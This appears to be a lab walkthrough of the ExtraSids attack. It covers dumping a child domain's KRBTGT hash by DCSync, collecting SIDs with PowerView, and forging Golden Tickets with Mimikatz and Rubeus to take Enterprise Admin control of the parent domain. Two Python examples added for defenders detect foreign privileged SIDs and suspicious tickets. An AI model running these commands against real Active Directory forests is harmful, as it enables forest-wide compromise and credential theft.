
ExtraSids from Windows

This attack allows a parent domain to be compromised once a child domain in the same forest has been compromised. Within a single AD forest, the sidHistory attribute is honored because SID Filtering is not applied to intra-forest trusts. SID Filtering is a protection that strips foreign SIDs from authentication requests arriving across a trust from a domain in another forest. Therefore, if a user in the child domain has their sidHistory set to the SID of the Enterprise Admins group (which exists only in the parent domain), they are treated as a member of that group, which grants administrative access to the entire forest. In other words, we create a Golden Ticket in the compromised child domain and use it to compromise the parent domain: the ticket's SIDHistory (ExtraSIDs) is set to the SID of the Enterprise Admins group, so an account (even a non-existent one) receives Enterprise Admin rights and full access to the parent domain without actually being a member of the group.

To perform this attack after compromising a child domain, we need the following:

  • The KRBTGT hash for the child domain
    • First, we need to obtain the NT hash for the KRBTGT account, which is the service account for the Key Distribution Center (KDC) in Active Directory. The KRBTGT (Kerberos Ticket Granting Ticket) account's key is used to encrypt and sign all Kerberos tickets granted within a given domain, and domain controllers use the account's password to decrypt and validate those tickets. With the KRBTGT key, Kerberos TGTs can be forged and then used to request TGS tickets for any service on any host in the domain. This is known as the Golden Ticket attack and is a well-known persistence mechanism for attackers in Active Directory environments. The only way to invalidate a Golden Ticket is to change the password of the KRBTGT account, which should be done periodically and definitely after a penetration test in which full domain compromise is reached.
  • The SID for the child domain
  • The name of a target user in the child domain (does not need to exist!)
  • The FQDN of the child domain
  • The SID of the Enterprise Admins group of the root domain
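The following is an added example, not part of the original notes or of Mimikatz/Rubeus. It models in Python what a domain controller does with the Extra SIDs carried in a ticket's PAC when the ticket crosses a trust: with SID Filtering (quarantine) enabled, every SID that is not relative to the trusted domain is stripped, so the Enterprise Admins SID from the parent domain would never reach authorization; on an intra-forest parent/child trust no filtering is applied, which is why the attack works. The SIDs are the ones from these notes; the function names and the privileged-RID table are the example's own, and the filtering model is a simplification of the real trust logic.

```python
"""Model of SID Filtering applied to the Extra SIDs in a Kerberos PAC.

Added example (not part of the original notes). The SID values are taken
from the notes; everything else is this example's own construction.
"""

# Values taken from the notes.
CHILD_DOMAIN_SID = "S-1-5-21-2806153819-209893948-922872689"
PARENT_DOMAIN_SID = "S-1-5-21-3842939050-3880317879-2865463114"
ENTERPRISE_ADMINS_SID = PARENT_DOMAIN_SID + "-519"
CHILD_GROUP_RIDS = [513, 512, 520, 518, 519]  # "Groups Id" shown in the Mimikatz output

# Well-known RIDs that carry administrative rights in any domain.
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}


def split_sid(sid):
    """Split 'S-1-5-21-A-B-C-RID' into (domain SID, RID)."""
    domain_sid, _, rid = sid.rpartition("-")
    return domain_sid, int(rid)


def sid_filter(trusted_domain_sid, extra_sids, quarantined):
    """Model SID Filtering (quarantine) at the trusting domain's DC.

    With quarantine enabled only SIDs relative to the trusted domain survive;
    SIDs from any other domain are dropped before authorization. Intra-forest
    (parent/child) trusts are not quarantined by default, so every Extra SID
    passes through untouched. Returns (kept, dropped).
    """
    if not quarantined:
        return list(extra_sids), []
    kept, dropped = [], []
    for sid in extra_sids:
        domain_sid, _ = split_sid(sid)
        (kept if domain_sid == trusted_domain_sid else dropped).append(sid)
    return kept, dropped


def effective_sids(ticket_domain_sid, group_rids, extra_sids):
    """The SID set an authorizing DC builds from the PAC after filtering."""
    return [f"{ticket_domain_sid}-{rid}" for rid in group_rids] + list(extra_sids)


def foreign_privileged_sids(ticket_domain_sid, sids):
    """Flag privileged group SIDs that belong to a domain other than the ticket's own.

    A ticket issued for LOGISTICS that carries the parent's Enterprise Admins SID
    is exactly what this catches; privileged groups of the ticket's own domain
    are the normal case and are not reported.
    """
    findings = []
    for sid in sids:
        domain_sid, rid = split_sid(sid)
        if domain_sid != ticket_domain_sid and rid in PRIVILEGED_RIDS:
            findings.append((sid, PRIVILEGED_RIDS[rid]))
    return findings


if __name__ == "__main__":
    for quarantined in (False, True):
        kept, dropped = sid_filter(CHILD_DOMAIN_SID, [ENTERPRISE_ADMINS_SID], quarantined)
        sids = effective_sids(CHILD_DOMAIN_SID, CHILD_GROUP_RIDS, kept)
        print(f"quarantined={quarantined}: kept={kept} dropped={dropped}")
        print("  foreign privileged SIDs:", foreign_privileged_sids(CHILD_DOMAIN_SID, sids))
```

Running it shows the two outcomes side by side: without quarantine the parent's Enterprise Admins SID is kept and `foreign_privileged_sids` reports it, which is the condition a defender reviewing PAC contents or DC logon data wants to alert on; with quarantine it is dropped before it can grant anything. Quarantine cannot be enabled on a parent/child trust within a forest, which is why the forest, not the domain, is the security boundary.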

ExtraSids Attack - Mimikatz

Prerequisite

Having compromised the child domain, log in as a Domain Admin (or an account with similar rights) and perform a DCSync attack to obtain the NT hash of the KRBTGT account.

Collecting data

1. Obtaining the KRBTGT Account's NT Hash using Mimikatz

mimikatz> lsadump::dcsync /user:LOGISTICS\krbtgt
|->
Hash NTLM: 9d765b482771505cbe97411065964d5f

2. Obtaining the SID for the child domain

We can use the PowerView Get-DomainSID function to get the SID for the child domain, but it is also visible in the Mimikatz output above.

Import-Module .\PowerView.ps1
Get-DomainSID
|-> 
S-1-5-21-2806153819-209893948-922872689

3. Obtaining the SID of the Enterprise Admins group of the root domain

Next, we can use Get-DomainGroup from PowerView to obtain the SID for the Enterprise Admins group in the parent domain. We could also do this with the Get-ADGroup cmdlet, with a command such as Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL".

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
|->
distinguishedname                                       objectsid
-----------------                                       ---------
CN=Enterprise Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL S-1-5-21-3842939050-3880317879-2865463114-519

4. Obtaining the FQDN of the child domain

Import-Module .\PowerView.ps1
Get-DomainTrust
|->
SourceName      : LOGISTICS.INLANEFREIGHT.LOCAL

5. Name of a target user in the child domain

hacker

What we have

At this point, we have gathered the following data points:

  • The KRBTGT hash for the child domain: 9d765b482771505cbe97411065964d5f
  • The SID for the child domain: S-1-5-21-2806153819-209893948-922872689
  • The name of a target user in the child domain (does not need to exist to create our Golden Ticket!): We'll choose a fake user: hacker
  • The FQDN of the child domain: LOGISTICS.INLANEFREIGHT.LOCAL
  • The SID of the Enterprise Admins group of the root domain: S-1-5-21-3842939050-3880317879-2865463114-519

Executing Attack

Confirm that we DON'T have access before the attack

ls \\academy-ea-dc01.inlanefreight.local\c$
|-> Access is denied

Creating a Golden Ticket with Mimikatz

Using Mimikatz and the data listed above, we can create a Golden Ticket to access all resources within the parent domain.

mimikatz> kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
|->
User      : hacker
Domain    : LOGISTICS.INLANEFREIGHT.LOCAL (LOGISTICS)
SID       : S-1-5-21-2806153819-209893948-922872689
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-3842939050-3880317879-2865463114-519 ;
ServiceKey: 9d765b482771505cbe97411065964d5f - rc4_hmac_nt
Lifetime  : 3/25/2023 3:24:46 PM ; 3/22/2033 3:24:46 PM ; 3/22/2033 3:24:46 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'hacker @ LOGISTICS.INLANEFREIGHT.LOCAL' successfully submitted for current session

Confirming a Kerberos Ticket is in Memory Using klist

klist
|->
Cached Tickets: (1)

#0>     Client: hacker @ LOGISTICS.INLANEFREIGHT.LOCAL
        Server: krbtgt/LOGISTICS.INLANEFREIGHT.LOCAL @ LOGISTICS.INLANEFREIGHT.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 3/25/2023 15:24:46 (local)
        End Time:   3/22/2033 15:24:46 (local)
        Renew Time: 3/22/2033 15:24:46 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

Listing the Entire C: Drive of the Domain Controller

From here, it is possible to access any resource within the parent domain, and the parent domain could be compromised in several ways.

ls \\academy-ea-dc01.inlanefreight.local\c$
cd \\academy-ea-dc01.inlanefreight.local\c$

ExtraSids Attack - Rubeus

Confirm that we DON'T have access before the attack

ls \\academy-ea-dc01.inlanefreight.local\c$
|-> Access is denied

Creating a Golden Ticket using Rubeus

.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689  /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
|->
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : LOGISTICS.INLANEFREIGHT.LOCAL (LOGISTICS)
[*] SID            : S-1-5-21-2806153819-209893948-922872689
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ExtraSIDs      : S-1-5-21-3842939050-3880317879-2865463114-519
[*] ServiceKey     : 9D765B482771505CBE97411065964D5F
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : 9D765B482771505CBE97411065964D5F
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : krbtgt
[*] Target         : LOGISTICS.INLANEFREIGHT.LOCAL

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'hacker@LOGISTICS.INLANEFREIGHT.LOCAL'

[*] AuthTime       : 3/25/2023 3:35:11 PM
[*] StartTime      : 3/25/2023 3:35:11 PM
[*] EndTime        : 3/26/2023 1:35:11 AM
[*] RenewTill      : 4/1/2023 3:35:11 PM
[*] base64(ticket.kirbi):

      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


[+] Ticket successfully imported!

Confirming the Ticket is in Memory Using klist

klist
|->
Current LogonId is 0:0x708a1
Cached Tickets: (1)
#0>     Client: hacker @ LOGISTICS.INLANEFREIGHT.LOCAL
        Server: krbtgt/LOGISTICS.INLANEFREIGHT.LOCAL @ LOGISTICS.INLANEFREIGHT.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 3/25/2023 15:35:11 (local)
        End Time:   3/26/2023 1:35:11 (local)
        Renew Time: 4/1/2023 15:35:11 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
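The two klist outputs above (the Mimikatz ticket and the Rubeus ticket) are a useful contrast for anyone triaging tickets on an endpoint, so here is an added example, not part of the original notes or of klist, Mimikatz or Rubeus, that parses klist output and applies two simple checks: the ticket lifetime against the Default Domain Policy maximum of 10 hours for a user TGT, and the ticket encryption type, since a ticket forged from the KRBTGT NT hash is RC4 while domain controllers in a current domain issue AES tickets by default. The sample text is copied from the two klist captures above and embedded as constructed input; the function names are the example's own. The Mimikatz ticket trips both checks because of its ten-year lifetime, while the Rubeus ticket uses a policy-conformant 10-hour lifetime and is only caught by the cipher check, which is why lifetime alone is not a sufficient detection.

```python
"""Triage of klist output: lifetime and cipher checks for cached TGTs.

Added example (not part of the original notes). The two sample outputs are
copied from the klist captures in the notes and used here as constructed input.
"""
import re
from datetime import datetime, timedelta

# Default Domain Policy: "Maximum lifetime for user ticket" is 10 hours.
MAX_TGT_LIFETIME = timedelta(hours=10)

KLIST_MIMIKATZ = """\
Cached Tickets: (1)

#0>     Client: hacker @ LOGISTICS.INLANEFREIGHT.LOCAL
        Server: krbtgt/LOGISTICS.INLANEFREIGHT.LOCAL @ LOGISTICS.INLANEFREIGHT.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 3/25/2023 15:24:46 (local)
        End Time:   3/22/2033 15:24:46 (local)
        Renew Time: 3/22/2033 15:24:46 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
"""

KLIST_RUBEUS = """\
Current LogonId is 0:0x708a1
Cached Tickets: (1)
#0>     Client: hacker @ LOGISTICS.INLANEFREIGHT.LOCAL
        Server: krbtgt/LOGISTICS.INLANEFREIGHT.LOCAL @ LOGISTICS.INLANEFREIGHT.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 3/25/2023 15:35:11 (local)
        End Time:   3/26/2023 1:35:11 (local)
        Renew Time: 4/1/2023 15:35:11 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
"""

TIME_FMT = "%m/%d/%Y %H:%M:%S"  # klist prints local time in this shape
FIELD_RE = {
    "client": r"Client:\s*(\S+) @ (\S+)",
    "server": r"Server:\s*(\S+) @ (\S+)",
    "enctype": r"KerbTicket Encryption Type:\s*(.+)",
    "start": r"Start Time:\s*(\d+/\d+/\d+ \d+:\d+:\d+)",
    "end": r"End Time:\s*(\d+/\d+/\d+ \d+:\d+:\d+)",
}


def parse_klist(text):
    """Return one dict per '#N>' ticket block in klist output."""
    tickets = []
    for block in re.split(r"^#\d+>", text, flags=re.MULTILINE)[1:]:
        client = re.search(FIELD_RE["client"], block)
        server = re.search(FIELD_RE["server"], block)
        tickets.append({
            "client": client.group(1),
            "client_realm": client.group(2),
            "server": server.group(1),
            "enctype": re.search(FIELD_RE["enctype"], block).group(1).strip(),
            "start": datetime.strptime(re.search(FIELD_RE["start"], block).group(1), TIME_FMT),
            "end": datetime.strptime(re.search(FIELD_RE["end"], block).group(1), TIME_FMT),
        })
    return tickets


def lifetime_hours(ticket):
    """Ticket validity window in hours (End Time minus Start Time)."""
    return (ticket["end"] - ticket["start"]).total_seconds() / 3600


def triage(ticket):
    """Return human-readable findings; an empty list means nothing stood out."""
    findings = []
    lifetime = ticket["end"] - ticket["start"]
    if lifetime > MAX_TGT_LIFETIME:
        findings.append(f"lifetime {lifetime} exceeds the 10h policy maximum for a user TGT")
    if "RC4" in ticket["enctype"]:
        findings.append("RC4-encrypted TGT; DCs issue AES tickets by default, forged NT-hash tickets are RC4")
    return findings


if __name__ == "__main__":
    for label, text in (("mimikatz", KLIST_MIMIKATZ), ("rubeus", KLIST_RUBEUS)):
        for ticket in parse_klist(text):
            print(f"[{label}] {ticket['client']}@{ticket['client_realm']} -> {ticket['server']}, "
                  f"{lifetime_hours(ticket):.1f}h")
            for finding in triage(ticket):
                print("   -", finding)
```

Neither check sees the Extra SIDs themselves, since klist does not display PAC contents; the authoritative place to look for a child-domain account arriving with the parent's Enterprise Admins SID is the parent domain controller's logon and service-ticket events, where the account's domain and the privileged SID it carries can be compared.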